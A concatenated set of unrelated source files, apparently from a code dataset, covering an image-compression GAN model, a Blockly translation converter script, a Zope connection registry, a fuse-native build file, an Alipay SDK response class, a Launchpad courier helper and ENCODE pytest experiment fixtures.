if self.model_mode == ModelModes.EVALUATION and (self.training is False):
reconstruction = reconstruction[:, :, :image_dims[1], :image_dims[2]]
intermediates = Intermediates(x, reconstruction, latents_quantized,
total_nbpp, total_qbpp)
return intermediates, hyperinfo
def discriminator_forward(self, intermediates, train_generator):
""" Train on gen/real batches simultaneously. """
x_gen = intermediates.reconstruction
x_real = intermediates.input_image
# Alternate between training discriminator and compression models
if train_generator is False:
x_gen = x_gen.detach()
D_in = torch.cat([x_real, x_gen], dim=0)
latents = intermediates.latents_quantized.detach()
latents = torch.repeat_interleave(latents, 2, dim=0)
D_out, D_out_logits = self.Discriminator(D_in, latents)
D_out = torch.squeeze(D_out)
D_out_logits = torch.squeeze(D_out_logits)
D_real, D_gen = torch.chunk(D_out, 2, dim=0)
D_real_logits, D_gen_logits = torch.chunk(D_out_logits, 2, dim=0)
return Disc_out(D_real, D_gen, D_real_logits, D_gen_logits)
def distortion_loss(self, x_gen, x_real):
# loss in [0,255] space but normalized by 255 to not be too big
# - Delegate scaling to weighting
sq_err = self.squared_difference(x_gen*255., x_real*255.) # / 255.
return torch.mean(sq_err)
def perceptual_loss_wrapper(self, x_gen, x_real, normalize=True):
""" Assumes inputs are in [0, 1] if normalize=True, else [-1, 1] """
LPIPS_loss = self.perceptual_loss.forward(x_gen, x_real, normalize=normalize)
return torch.mean(LPIPS_loss)
def compression_loss(self, intermediates, hyperinfo):
x_real = intermediates.input_image
x_gen = intermediates.reconstruction
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
x_real = (x_real + 1.) / 2.
x_gen = (x_gen + 1.) / 2.
distortion_loss = self.distortion_loss(x_gen, x_real)
perceptual_loss = self.perceptual_loss_wrapper(x_gen, x_real, normalize=True)
weighted_distortion = self.args.k_M * distortion_loss
weighted_perceptual = self.args.k_P * perceptual_loss
weighted_rate, rate_penalty = losses.weighted_rate_loss(self.args, total_nbpp=intermediates.n_bpp,
total_qbpp=intermediates.q_bpp, step_counter=self.step_counter, ignore_schedule=self.args.ignore_schedule)
weighted_R_D_loss = weighted_rate + weighted_distortion
weighted_compression_loss = weighted_R_D_loss + weighted_perceptual
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('rate_penalty', rate_penalty)
self.store_loss('distortion', distortion_loss.item())
self.store_loss('perceptual', perceptual_loss.item())
self.store_loss('n_rate', intermediates.n_bpp.item())
self.store_loss('q_rate', intermediates.q_bpp.item())
self.store_loss('n_rate_latent', hyperinfo.latent_nbpp.item())
self.store_loss('q_rate_latent', hyperinfo.latent_qbpp.item())
self.store_loss('n_rate_hyperlatent', hyperinfo.hyperlatent_nbpp.item())
self.store_loss('q_rate_hyperlatent', hyperinfo.hyperlatent_qbpp.item())
self.store_loss('weighted_rate', weighted_rate.item())
self.store_loss('weighted_distortion', weighted_distortion.item())
self.store_loss('weighted_perceptual', weighted_perceptual.item())
self.store_loss('weighted_R_D', weighted_R_D_loss.item())
self.store_loss('weighted_compression_loss_sans_G', weighted_compression_loss.item())
return weighted_compression_loss
def GAN_loss(self, intermediates, train_generator=False):
"""
train_generator: Flag to send gradients to generator
"""
disc_out = self.discriminator_forward(intermediates, train_generator)
D_loss = self.gan_loss(disc_out, mode='discriminator_loss')
G_loss = self.gan_loss(disc_out, mode='generator_loss')
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('D_gen', torch.mean(disc_out.D_gen).item())
self.store_loss('D_real', torch.mean(disc_out.D_real).item())
self.store_loss('disc_loss', D_loss.item())
self.store_loss('gen_loss', G_loss.item())
self.store_loss('weighted_gen_loss', (self.args.beta * G_loss).item())
return D_loss, G_loss
def compress(self, x, silent=False):
"""
* Pass image through encoder to obtain latents: x -> Encoder() -> y
* Pass latents through hyperprior encoder to obtain hyperlatents:
y -> hyperencoder() -> z
* Encode hyperlatents via nonparametric entropy model.
* Pass hyperlatents through mean-scale hyperprior decoder to obtain mean,
scale over latents: z -> hyperdecoder() -> (mu, sigma).
* Encode latents via entropy model derived from (mean, scale) hyperprior output.
"""
assert self.model_mode == ModelModes.EVALUATION and (self.training is False), (
f'Set model mode to {ModelModes.EVALUATION} for compression.')
spatial_shape = tuple(x.size()[2:])
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_encoder_downsamples = self.Encoder.n_downsampling_layers
factor = 2 ** n_encoder_downsamples
x = utils.pad_factor(x, x.size()[2:], factor)
# Encoder forward pass
y = self.Encoder(x)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_hyperencoder_downsamples = self.Hyperprior.analysis_net.n_downsampling_layers
factor = 2 ** n_hyperencoder_downsamples
y = utils.pad_factor(y, y.size()[2:], factor)
compression_output = self.Hyperprior.compress_forward(y, spatial_shape)
attained_hbpp = 32 * len(compression_output.hyperlatents_encoded) / np.prod(spatial_shape)
attained_lbpp = 32 * len(compression_output.latents_encoded) / np.prod(spatial_shape)
attained_bpp = 32 * ((len(compression_output.hyperlatents_encoded) +
len(compression_output.latents_encoded)) / np.prod(spatial_shape))
if silent is False:
self.logger.info('[ESTIMATED]')
self.logger.info(f'BPP: {compression_output.total_bpp:.3f}')
self.logger.info(f'HL BPP: {compression_output.hyperlatent_bpp:.3f}')
self.logger.info(f'L BPP: {compression_output.latent_bpp:.3f}')
self.logger.info('[ATTAINED]')
self.logger.info(f'BPP: {attained_bpp:.3f}')
self.logger.info(f'HL BPP: {attained_hbpp:.3f}')
self.logger.info(f'L BPP: {attained_lbpp:.3f}')
return compression_output
def decompress(self, compression_output):
"""
* Recover z* from compressed message.
* Pass recovered hyperlatents through mean-scale hyperprior decoder obtain mean,
scale over latents: z -> hyperdecoder() -> (mu, sigma).
* Use latent entropy model to recover y* from compressed image.
* Pass quantized latent through generator to obtain the reconstructed image.
y* -> Generator() -> x*.
"""
assert self.model_mode == ModelModes.EVALUATION and (self.training is False), (
f'Set model mode to {ModelModes.EVALUATION} for decompression.')
latents_decoded = self.Hyperprior.decompress_forward(compression_output, device=utils.get_device())
# Use quantized latents as input to G
reconstruction = self.Generator(latents_decoded)
if self.args.normalize_input_image is True:
reconstruction = torch.tanh(reconstruction)
# Undo padding
image_dims = compression_output.spatial_shape
reconstruction = reconstruction[:, :, :image_dims[0], :image_dims[1]]
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
reconstruction = (reconstruction + 1.) / 2.
reconstruction = torch.clamp(reconstruction, min=0., max=1.)
return reconstruction
def forward(self, x, train_generator=False, return_intermediates=False, writeout=True):
self.writeout = writeout
losses = dict()
if train_generator is True:
# Define a 'step' as one cycle of G-D training
self.step_counter += 1
intermediates, hyperinfo = self.compression_forward(x)
if self.model_mode == ModelModes.EVALUATION:
reconstruction = intermediates.reconstruction
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
reconstruction = (reconstruction + 1.) / 2.
reconstruction = torch.clamp(reconstruction, min=0., max=1.)
return reconstruction, intermediates.q_bpp
compression_model_loss = self.compression_loss(intermediates, hyperinfo)
if self.use_discriminator is True:
# Only send gradients to generator when training generator via
# `train_generator` flag
D_loss, G_loss = self.GAN_loss(intermediates, train_generator)
weighted_G_loss = self.args.beta * G_loss
compression_model_loss += weighted_G_loss
losses['disc'] = D_loss
losses['compression'] = compression_model_loss
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('weighted_compression_loss', compression_model_loss.item())
if return_intermediates is True:
return losses, intermediates
else:
return losses
if __name__ == '__main__':
compress_test = False
if compress_test is True:
model_mode = ModelModes.EVALUATION
else:
model_mode = ModelModes.TRAINING
logger = utils.logger_setup(logpath=os.path.join(directories.experiments, 'logs'), filepath=os.path.abspath(__file__))
device = utils.get_device()
logger.info(f'Using device {device}')
storage_train = defaultdict(list)
storage_test = defaultdict(list)
model = Model(hific_args, logger, storage_train, storage_test, model_mode=model_mode, model_type=ModelTypes.COMPRESSION_GAN)
model.to(device)
logger.info(model)
transform_param_names = list()
transform_params = list()
logger.info('ALL PARAMETERS')
for n, p in model.named_parameters():
if ('Encoder' in n) or ('Generator' in n):
transform_param_names.append(n)
transform_params.append(p)
if ('analysis' in n) or ('synthesis' in n):
transform_param_names.append(n)
transform_params.append(p)
logger.info(f'{n} - {p.shape}')
logger.info('AMORTIZATION PARAMETERS')
amortization_named_parameters = itertools.chain.from_iterable(
[am.named_parameters() for am in model.amortization_models])
for n, p in amortization_named_parameters:
logger.info(f'{n} - {p.shape}')
logger.info('AMORTIZATION PARAMETERS')
for n, p in zip(transform_param_names, transform_params):
logger.info(f'{n} - {p.shape}')
logger.info('HYPERPRIOR PARAMETERS')
for n, p in model.Hyperprior.hyperlatent_likelihood.named_parameters():
logger.info(f'{n} - {p.shape}')
if compress_test is False:
logger.info('DISCRIMINATOR PARAMETERS')
for n, p in model.Discriminator.named_parameters():
logger.info(f'{n} - {p.shape}')
logger.info("Number of trainable parameters: {}".format(utils.count_parameters(model)))
logger.info("Estimated size: {} MB".format(utils.count_parameters(model) * 4. / 10**6))
B = 10
shape = [B, 3, 256, 256]
x = torch.randn(shape).to(device)
start_time = time.time()
if compress_test is True:
model.eval()
logger.info('Starting compression with input shape {}'.format(shape))
compression_output = model.compress(x)
reconstruction = model.decompress(compression_output)
logger.info(f"n_bits: {compression_output.total_bits}")
logger.info(f"bpp: {compression_output.total_bpp}")
logger.info(f"MSE: {torch.mean(torch.square(reconstruction - x)).item()}")
else:
logger.info('Starting forward pass with input shape {}'.format(shape))
losses = model(x)
compression_loss, disc_loss = losses['compression'], losses['disc']
logger.info('Delta t {:.3f}s'.format(time.time() - start_time))
|
i18n/json_to_js.py
|
bharati-software/blockly-games-Kannada
| 1,184 |
76325
|
<reponame>bharati-software/blockly-games-Kannada<gh_stars>1000+
#!/usr/bin/python
# Converts .json files from Translatewiki into .js files.
#
# Copyright 2013 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import codecs # for codecs.open(..., 'utf-8')
import glob
import json # for json.load()
import os # for os.path()
import subprocess # for subprocess.check_call()
from common import InputError
# Store parsed command-line arguments in global variable.
args = None
def _insert_breaks(s, min_length, max_length):
"""Inserts line breaks to try to get line lengths within the given range.
This tries to minimize raggedness and to break lines at punctuation
(periods and commas). It never splits words or numbers. Multiple spaces
may be converted into single spaces.
Args:
s: The string to split.
min_length: The requested minimum number of characters per line.
max_length: The requested minimum number of characters per line.
Returns:
A copy of the original string with zero or more line breaks inserted.
"""
newline = '\\n'
if len(s) < min_length:
return s
# Try splitting by sentences. This assumes sentences end with periods.
sentences = s.split('.')
# Remove empty sentences.
sentences = [sen for sen in sentences if sen]
# If all sentences are at least min_length and at most max_length,
# then return one per line.
if not [sen for sen in sentences if
len(sen) > max_length or len(sen) < min_length]:
return newline.join([sen.strip() + '.' for sen in sentences])
# Otherwise, divide into words, and use a greedy algorithm for the first
# line, and try to get later lines as close as possible in length.
words = [word for word in s.split(' ') if word]
line1 = ''
while (len(line1) + 1 + len(words[0]) < max_length and
# Preferentially split on periods and commas.
(not ((line1.endswith('. ') or line1.endswith(', ')) and
len(line1) > min_length))):
line1 += words.pop(0) + ' '
# If it all fits on one line, return that line.
if not words:
return line1
ideal_length = len(line1)
output = line1
line = ''
while words:
line += words.pop(0) + ' '
if words:
potential_len = len(line) + len(words[0])
if (potential_len > max_length or
potential_len - ideal_length > ideal_length - len(line) or
(line.endswith('. ') and len(line) > min_length)):
output += newline + line
line = ''
output += newline + line
return output
def _create_xlf(target_lang):
"""Creates a <target_lang>.xlf file for Soy.
Args:
target_lang: The ISO 639 language code for the target language.
This is used in the name of the file and in the metadata.
Returns:
A pointer to a file to which the metadata has been written.
Raises:
IOError: An error occurred while opening or writing the file.
"""
filename = os.path.join(os.curdir, args.output_dir, target_lang + '.xlf')
out_file = codecs.open(filename, 'w', 'utf-8')
out_file.write("""<?xml version="1.0" encoding="UTF-8"?>
<xliff version="1.2" xmlns="urn:oasis:names:tc:xliff:document:1.2">
<file original="SoyMsgBundle"
datatype="x-soy-msg-bundle"
xml:space="preserve"
source-language="{0}"
target-language="{1}">
<body>""".format(args.source_lang, target_lang))
return out_file
def _close_xlf(xlf_file):
"""Closes a <target_lang>.xlf file created with create_xlf().
This includes writing the terminating XML.
Args:
xlf_file: A pointer to a file created by _create_xlf().
Raises:
IOError: An error occurred while writing to or closing the file.
"""
xlf_file.write("""
</body>
</file>
</xliff>
""")
xlf_file.close()
def _process_file(path_to_json, target_lang, key_dict):
"""Creates an .xlf file corresponding to the specified .json input file.
The name of the input file must be target_lang followed by '.json'.
The name of the output file will be target_lang followed by '.js'.
Args:
path_to_json: Path to the directory of xx.json files.
target_lang: A IETF language code (RFC 4646), such as 'es' or 'pt-br'.
key_dict: Dictionary mapping Blockly keys (e.g., Maze.turnLeft) to
Closure keys (hash numbers).
Raises:
IOError: An I/O error occurred with an input or output file.
InputError: Input JSON could not be parsed.
KeyError: Key found in input file but not in key file.
"""
filename = os.path.join(path_to_json, target_lang + '.json')
in_file = open(filename)
try:
j = json.load(in_file)
in_file.close()
except ValueError, e:
print('Error reading ' + filename)
raise InputError(file, str(e))
out_file = _create_xlf(target_lang)
for key in j:
if key != '@metadata':
try:
identifier = key_dict[key]
except KeyError as e:
print('Key "%s" is in %s but not in %s' %
(key, filename, args.key_file))
raise e
target = j.get(key)
# Only insert line breaks for tooltips.
if key.lower().find('tooltip') != -1:
target = _insert_breaks(
j.get(key), args.min_length, args.max_length)
out_file.write(u"""
<trans-unit id="{0}" datatype="html">
<target>{1}</target>
</trans-unit>""".format(identifier, target))
_close_xlf(out_file)
def main():
"""Parses arguments and iterates over files."""
# Set up argument parser.
parser = argparse.ArgumentParser(description='Convert JSON files to JS.')
parser.add_argument('--source_lang', default='en',
help='ISO 639-1 source language code')
parser.add_argument('--output_dir', default='generated/',
help='relative directory for output files')
parser.add_argument('--key_file', default='json/keys.json',
help='relative path to input keys file')
parser.add_argument('--template', default='template.soy')
parser.add_argument('--min_length', default=30,
help='minimum line length (not counting last line)')
parser.add_argument('--max_length', default=50,
help='maximum line length (not guaranteed)')
parser.add_argument('--path_to_jar', default='third-party-downloads',
help='relative path from working directory to '
'SoyToJsSrcCompiler.jar')
parser.add_argument('files', nargs='+', help='input files')
# Initialize global variables.
global args
args = parser.parse_args()
# Make sure output_dir ends with slash.
if (not args.output_dir.endswith(os.path.sep)):
args.output_dir += os.path.sep
# Read in keys.json, mapping descriptions (e.g., Maze.turnLeft) to
# Closure keys (long hash numbers).
key_file = open(args.key_file)
key_dict = json.load(key_file)
key_file.close()
# Process each input file.
print('Creating .xlf files...')
processed_langs = []
if len(args.files) == 1:
# Windows does not expand globs automatically.
args.files = glob.glob(args.files[0])
for arg_file in args.files:
(path_to_json, filename) = os.path.split(arg_file)
if not filename.endswith('.json'):
raise InputError(filename, 'filenames must end with ".json"')
target_lang = filename[:filename.index('.')]
if not target_lang in ('qqq', 'keys'):
processed_langs.append(target_lang)
_process_file(path_to_json, target_lang, key_dict)
# Output command line for Closure compiler.
if processed_langs:
print('Creating .js files...')
processed_lang_list = ','.join(processed_langs)
subprocess.check_call([
'java',
'-jar', os.path.join(args.path_to_jar, 'SoyToJsSrcCompiler.jar'),
'--locales', processed_lang_list,
'--shouldProvideRequireSoyNamespaces',
'--isUsingIjData',
'--messageFilePathFormat', args.output_dir + '{LOCALE}.xlf',
'--outputPathFormat', os.path.join(args.output_dir, '{LOCALE}', 'soy.js'),
'--srcs', args.template])
if len(processed_langs) == 1:
print('Created ' + processed_lang_list + '/soy.js in ' + args.output_dir)
else:
print('Created {' + processed_lang_list + '}/soy.js in ' + args.output_dir)
for lang in processed_langs:
os.remove(args.output_dir + lang + '.xlf')
print('Removed .xlf files.')
if __name__ == '__main__':
main()
|
src/Testing/ZopeTestCase/connections.py
|
rbanffy/Zope
| 289 |
76340
|
<reponame>rbanffy/Zope
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""ZODB connection registry
"""
class ConnectionRegistry:
'''ZODB connection registry
This registry can hold either ZODB.Connection objects or OFS.Application
objects. In the latter case, a close operation will close the REQUEST as
well as the Connection referenced by the Application's _p_jar attribute.
'''
def __init__(self):
self._conns = []
def register(self, conn):
self._conns.append(conn)
def contains(self, conn):
return conn in self._conns
def __len__(self):
return len(self._conns)
def count(self):
return len(self)
def close(self, conn):
if self.contains(conn):
self._conns.remove(conn)
self._do_close(conn)
def closeAll(self):
for conn in self._conns:
self._do_close(conn)
self._conns = []
def _do_close(self, conn):
if hasattr(conn, 'close'):
conn.close()
else:
conn.REQUEST.close()
conn._p_jar.close()
registry = ConnectionRegistry()
register = registry.register
contains = registry.contains
count = registry.count
close = registry.close
closeAll = registry.closeAll
|
cupy_alias/manipulation/transpose.py
|
fixstars/clpy
| 142 |
76368
|
from clpy.manipulation.transpose import * # NOQA
|
binding.gyp
|
lideming/fuse-native
| 181 |
76385
|
<reponame>lideming/fuse-native<filename>binding.gyp
{
"targets": [{
"target_name": "fuse",
"include_dirs": [
"<!(node -e \"require('napi-macros')\")",
"<!(node -e \"require('fuse-shared-library/include')\")",
],
"libraries": [
"<!(node -e \"require('fuse-shared-library/lib')\")",
],
"sources": [
"fuse-native.c"
],
'xcode_settings': {
'OTHER_CFLAGS': [
'-g',
'-O3',
'-Wall'
]
},
'cflags': [
'-g',
'-O3',
'-Wall'
],
}, {
"target_name": "postinstall",
"type": "none",
"dependencies": ["fuse"],
"copies": [{
"destination": "build/Release",
"files": [ "<!(node -e \"require('fuse-shared-library/lib')\")" ],
}]
}]
}
|
alipay/aop/api/response/AlipayOverseasTravelShopSyncResponse.py
|
antopen/alipay-sdk-python-all
| 213 |
76408
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayOverseasTravelShopSyncResponse(AlipayResponse):
def __init__(self):
super(AlipayOverseasTravelShopSyncResponse, self).__init__()
self._shop_biz_status = None
self._sync_order_id = None
self._sync_status = None
@property
def shop_biz_status(self):
return self._shop_biz_status
@shop_biz_status.setter
def shop_biz_status(self, value):
self._shop_biz_status = value
@property
def sync_order_id(self):
return self._sync_order_id
@sync_order_id.setter
def sync_order_id(self, value):
self._sync_order_id = value
@property
def sync_status(self):
return self._sync_status
@sync_status.setter
def sync_status(self, value):
self._sync_status = value
def parse_response_content(self, response_content):
response = super(AlipayOverseasTravelShopSyncResponse, self).parse_response_content(response_content)
if 'shop_biz_status' in response:
self.shop_biz_status = response['shop_biz_status']
if 'sync_order_id' in response:
self.sync_order_id = response['sync_order_id']
if 'sync_status' in response:
self.sync_status = response['sync_status']
|
launchpad/nodes/courier/courier_utils.py
|
leloykun/launchpad
| 264 |
76436
|
# Lint as: python3
# Copyright 2020 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Courier utilities."""
from typing import Any, Callable, Text
from absl import logging
import courier
def _should_expose_method(func: Callable[..., Any], method_name: Text) -> bool:
return (callable(func) and not method_name.startswith('_') and
method_name != 'set_courier_server')
def make_courier_server(instance: Any, *courier_args,
**courier_kwargs) -> courier.Server:
"""Builds a courier.Server for an instance.
Args:
instance: The instance that the courier server associates with.
*courier_args: positional arguments to pass to courier.Server().
**courier_kwargs: keyword arguments to pass to courier.Server().
Returns:
A courier.Server object.
"""
server = courier.Server(*courier_args, **courier_kwargs)
# Bind all non-private user-defined local methods.
for method_name in dir(instance):
if method_name.startswith('_'):
continue
func = getattr(instance, method_name)
logging.info('Binding: %s', method_name)
if _should_expose_method(func, method_name):
server.Bind(method_name, func)
return server
|
src/encoded/tests/fixtures/schemas/experiment.py
|
procha2/encoded
| 102 |
76441
|
<gh_stars>100-1000
import pytest
@pytest.fixture
def experiment_chip_control(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'control_type': 'input library'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_chip_H3K4me3(testapp, lab, award, target_H3K4me3, ileum, experiment_chip_control):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K4me3['uuid'],
'possible_controls': [experiment_chip_control['@id']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_chip_H3K27me3(testapp, lab, award, target_H3K27me3, experiment_chip_control, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K27me3['uuid'],
'possible_controls': [experiment_chip_control['uuid']]
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_chip_CTCF(testapp, lab, award, target_CTCF, k562):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'biosample_ontology': k562['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_CTCF['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_rna(testapp, lab, award, h1):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'assay_term_name': 'RNA-seq',
'biosample_ontology': h1['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_dnase(testapp, lab, award, heart):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-10-08',
'assay_term_name': 'DNase-seq',
'biosample_ontology': heart['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def ctrl_experiment(testapp, lab, award, cell_free):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'biosample_ontology': cell_free['uuid'],
'status': 'in progress',
'assay_term_name': 'ChIP-seq'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_no_read_length(
testapp,
experiment,
bam_file,
file_fastq_no_read_length,
replicate_1_1,
base_library,
analysis_step_bam,
analysis_step_version_bam,
analysis_step_run_bam,
encode_lab,
):
testapp.patch_json(replicate_1_1['@id'], {'experiment': experiment['@id'],
'library': base_library['@id'],
})
testapp.patch_json(file_fastq_no_read_length['@id'], {'dataset': experiment['@id'],
'replicate':replicate_1_1['@id'],
})
testapp.patch_json(bam_file['@id'], {'dataset': experiment['@id'],
'step_run': analysis_step_run_bam['@id'],
'assembly': 'GRCh38',
'lab': encode_lab['@id'],
'derived_from': [file_fastq_no_read_length['@id']],
})
testapp.patch_json(experiment['@id'], {'status': 'released',
'date_released': '2016-01-01',
'assay_term_name': 'long read RNA-seq',
})
return testapp.get(experiment['@id'] + '@@index-data')
@pytest.fixture
def file_exp(lab, award, testapp, experiment, ileum):
item = {
'lab': lab['uuid'],
'award': award['uuid'],
'assay_term_name': 'RAMPAGE',
'biosample_ontology': ileum['uuid'],
'possible_controls': [experiment['uuid']],
'status': 'released',
'date_released': '2016-01-01'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def file_exp2(lab, award, testapp, ileum):
item = {
'lab': lab['uuid'],
'award': award['uuid'],
'assay_term_name': 'RAMPAGE',
'biosample_ontology': ileum['uuid'],
'status': 'released',
'date_released': '2016-01-01'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_RNA_seq(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'RNA-seq'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_RRBS(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'assay_term_name': 'RRBS',
'biosample_ontology': ileum['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_WGBS(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'biosample_ontology': ileum['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'assay_term_name': 'whole-genome shotgun bisulfite sequencing'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_control(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'control_type': 'control'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K27me3(testapp, lab, award, target_H3K27me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K27me3['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K36me3(testapp, lab, award, target_H3K36me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K36me3['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K4me1(testapp, lab, award, target_H3K4me1, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K4me1['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K4me3(testapp, lab, award, target_H3K4me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K4me3['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K27ac(testapp, lab, award, target_H3K27ac, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K27ac['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K9me3(testapp, lab, award, target_H3K9me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K9me3['uuid']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_pipeline_error(testapp, lab, award, cell_free):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ChIP-seq',
'biosample_ontology': cell_free['uuid'],
'internal_status': 'pipeline error',
}
return item
@pytest.fixture
def experiment_no_error(testapp, lab, award, cell_free):
item = {
'lab': lab['@id'],
'award': award['@id'],
'assay_term_name': 'ChIP-seq',
'biosample_ontology': cell_free['uuid'],
'internal_status': 'release ready',
}
return item
@pytest.fixture
def experiment_1(testapp, lab, award, cell_free):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': cell_free['uuid'],
'status': 'in progress'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_2(testapp, lab, award, cell_free):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': cell_free['uuid'],
'status': 'in progress'
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def base_experiment_submitted(testapp, lab, award, cell_free):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'assay_term_name': 'RNA-seq',
'biosample_ontology': cell_free['uuid'],
'status': 'submitted',
'date_submitted': '2015-07-23',
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def experiment_1_0(root, experiment, file, file_ucsc_browser_composite):
item = root.get_by_uuid(experiment['uuid'])
properties = item.properties.copy()
assert root.get_by_uuid(
file['uuid']).properties['dataset'] == str(item.uuid)
assert root.get_by_uuid(
